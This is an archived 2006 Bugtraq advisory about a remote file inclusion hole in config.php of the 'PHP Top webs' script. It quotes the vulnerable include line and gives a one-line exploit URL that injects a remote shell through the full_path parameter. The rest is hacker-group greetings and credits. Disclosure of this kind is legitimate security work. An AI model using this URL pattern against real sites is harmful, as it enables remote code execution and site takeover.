lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 13 Oct 2006 00:30:39 -0000
From: Le.CoPrA@...mail.com
To: bugtraq@...urityfocus.com
Subject: PHP Top webs (config.php) Remote File Inclue Vulnerability

=====================================================================

  # PHP Top webs (config.php) Remote File Inclue Vulnerability

=====================================================================

  # Author : Le CoPrA

=====================================================================

  # Download Script : http://www.linkini.net/phpscripts/descargas/Top%20Sites%20(8%20Archivos)/PHP%20Top%20webs.zip

=====================================================================
  
  # Bug in : config.php

  # Vuln Code :

       include_once("$full_path/functions.php");

 =====================================================================

  # Exploit :

          http://www.victim.com/[path]/config.php?full_path=|SHELL|?

 =====================================================================

   # Discovered by : Le CoPrA

   # ConTaCT  :  Le.CoPrA |at| Hotmail |dot| CoM

   # Special Greetz FlyinG 2 || Str0ke ||

   # Greetz4// alkasrgolden,LovER BoY, Saudi Hackrz, HACKERS PAL,kOnDoR, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64
             3theaby geer, Mohajer22, Qaher_Yhod, MR.WOLF, cRiMiNaL NeT, al3iznet,Abdullah-00 , egyptghost, ToOoFA,HaKrAwY

   # Channel : wWw.TrYaG.cOm/vb  || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com

===========================================================================================================================


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ